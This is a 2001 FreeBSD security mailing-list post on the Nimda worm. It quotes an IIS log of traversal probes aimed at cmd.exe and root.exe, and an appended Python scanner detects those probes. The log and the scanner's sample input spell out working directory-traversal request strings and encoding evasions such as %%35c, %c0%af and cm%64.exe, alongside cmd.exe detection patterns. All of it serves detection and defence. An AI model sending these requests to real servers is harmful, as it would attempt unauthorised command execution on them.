From owner-freebsd-security Tue Sep 18 14:54:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cpimssmtpu12.email.msn.com (cpimssmtpu12.email.msn.com [207.46.181.87]) by hub.freebsd.org (Postfix) with ESMTP id E4CDB37B413 for ; Tue, 18 Sep 2001 14:54:39 -0700 (PDT)
Received: from x86w2kw1 ([216.103.48.12]) by cpimssmtpu12.email.msn.com with Microsoft SMTPSVC(5.0.2195.3779); Tue, 18 Sep 2001 14:54:06 -0700
Message-ID: <010a01c1408c$82bf0380$0101a8c0@development.local>
From: "John Howie"
To: "Derek O'Flynn" , , "Brett Glass"
References: <4.3.2.7.2.20010918153412.0493bc10@localhost>
Subject: Re: NIMDA Virus
Date: Tue, 18 Sep 2001 14:54:36 -0700
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-OriginalArrivalTime: 18 Sep 2001 21:54:07.0028 (UTC) FILETIME=[70826F40:01C1408C]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Probably not enough - the Hydra (two-heads) is also doing NetBIOS queries. The example log below shows the entire attack from an IIS standpoint. I have no example of the NetBIOS attack pattern because we haven't been infected.

john...
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -

----- Original Message -----
From: "Brett Glass"
To: "Derek O'Flynn" ;
Sent: Tuesday, September 18, 2001 2:39 PM
Subject: Re: NIMDA Virus

> We just put a log monitor on the Apache server, and are firewalling anything
> that sends a request with "cmd.exe" in it. Quite effective.
>
> --Brett
>
> At 03:31 PM 9/18/2001, Derek O'Flynn wrote:
>
> >Has anyone successfully written a rule for snort to alert to this?
> >
> >I'm currently running snort 1.8 with flex-resp.
> >
> >I would like to have a rule that identifies the attacks and then sends the
> >tcp_rst command so that the worm can't infect new machines. I have the
> >information for the rule, just need to know what to put in the content field
> >to verify that it is nimda.
> >
> >Thanks,
> >Derek O'Flynn
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message
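Added example, not code posted by anyone in this thread: a small Python scanner that parses IIS W3C log lines laid out like the log John quoted (date, time, c-ip, a "-" placeholder, s-ip, s-port, method, uri-stem, uri-query, status, trailing "-"), canonicalises the request path so the different traversal spellings collapse to one form, and flags requests that end in cmd.exe or root.exe. It also implements Brett's simpler test (a raw substring match on the request as sent) so the two can be compared. The sample input is the sixteen requests from the quoted log plus four constructed lines: three encodings the log does not show (double-encoded `%%35c`, overlong UTF-8 `%c0%af`, and a percent-encoded filename `cm%64.exe`) and one benign request. The field layout, the constructed lines and the "direct-"/"traversal-to-" labels are this example's assumptions.

```python
"""Scan IIS W3C log lines for Nimda-style cmd.exe / root.exe probes.

Added example for the freebsd-security thread above; not list code.
Assumes the field layout of the quoted log:
  date time c-ip - s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status -
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<cip>\S+) ?- (?P<sip>\S+) (?P<port>\d+) "
    r"(?P<method>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)"
)

# 0xC0 and 0xC1 can never start a valid UTF-8 sequence (they would be overlong
# encodings of ASCII). IIS's decoder turned C0 AF / C1 9C / C1 1C into '/' or '\',
# which is what the traversal relies on, so treat any such pair as a separator.
# This is deliberately aggressive: fine for a detector, wrong for a web server.
OVERLONG = re.compile(r"[\xc0\xc1][\x00-\x1f\x80-\xff]?")

SUSPECT_BASENAMES = {"cmd.exe", "root.exe"}


def canonical_path(stem: str) -> str:
    """Reduce the many spellings of a traversal to one lower-cased, '/'-separated form."""
    s = stem
    for _ in range(3):  # bounded: %%35c -> %5c -> '\' takes two passes
        decoded = unquote(s, encoding="latin-1")  # one byte -> one char, no UTF-8 validation
        if decoded == s:
            break
        s = decoded
    s = OVERLONG.sub("/", s)
    s = s.replace("\\", "/")
    s = re.sub(r"/+", "/", s)
    return s.lower()


def classify_request(stem: str) -> Optional[str]:
    """Return a short reason if the request reaches cmd.exe or root.exe, else None."""
    path = canonical_path(stem)
    base = path.rsplit("/", 1)[-1]
    if base in SUSPECT_BASENAMES:
        return ("traversal-to-" if "/../" in path else "direct-") + base
    return None


def raw_match(stem: str) -> bool:
    """Brett's log-monitor test: does the request, as sent, mention cmd.exe or root.exe?"""
    s = stem.lower()
    return "cmd.exe" in s or "root.exe" in s


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, raw stem, reason) for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m is None:
            continue
        reason = classify_request(m["stem"])
        if reason is not None:
            hits.append((m["cip"], m["stem"], reason))
    return hits


def compare_detectors(text: str) -> Tuple[int, int]:
    """Lines flagged by (canonicalised basename check, raw substring match)."""
    canon = raw = 0
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m is None:
            continue
        canon += classify_request(m["stem"]) is not None
        raw += raw_match(m["stem"])
    return canon, raw


# Sample input: the sixteen requests from the IIS log quoted above (the 'Á' is
# how the log rendered the 0xC1 lead byte of an overlong UTF-8 pair), then four
# constructed lines: three encodings the log does not show and one benign request.
SAMPLE_LOG = """\
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /MSADC/root.exe /c+dir 404 -
2001-09-18 13:21:25 216.210.XXX.XXX - 192.168.1.251 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:27 216.210.XXX.XXX - 192.168.1.251 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:28 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:29 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2001-09-18 13:21:30 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%%35c../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:21:30 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200 -
2001-09-18 13:21:30 216.210.XXX.XXX - 192.168.1.251 80 GET /scripts/..%5c../winnt/system32/cm%64.exe /c+dir 200 -
2001-09-18 13:22:01 10.0.0.5 - 192.168.1.251 80 GET /index.html - 200 -
"""

if __name__ == "__main__":
    for cip, stem, reason in scan_log(SAMPLE_LOG):
        print(f"{cip:16} {reason:22} {stem}")
    print("flagged (canonical, raw):", compare_detectors(SAMPLE_LOG))
```

Two things worth noticing when this runs over the quoted log. First, every one of the sixteen real requests contains `cmd.exe` or `root.exe` literally; the encoding tricks are all in the traversal part of the path, so a raw match like Brett's, or a Snort `content:"cmd.exe"; nocase;` test, catches all sixteen. Second, the raw match misses the constructed `cm%64.exe` line while the canonicalised check still flags it, which is why a detector should decode the path the way the target server would before matching, and why a `%%35c` or `%c0%af` request deserves the same treatment as `%5c`.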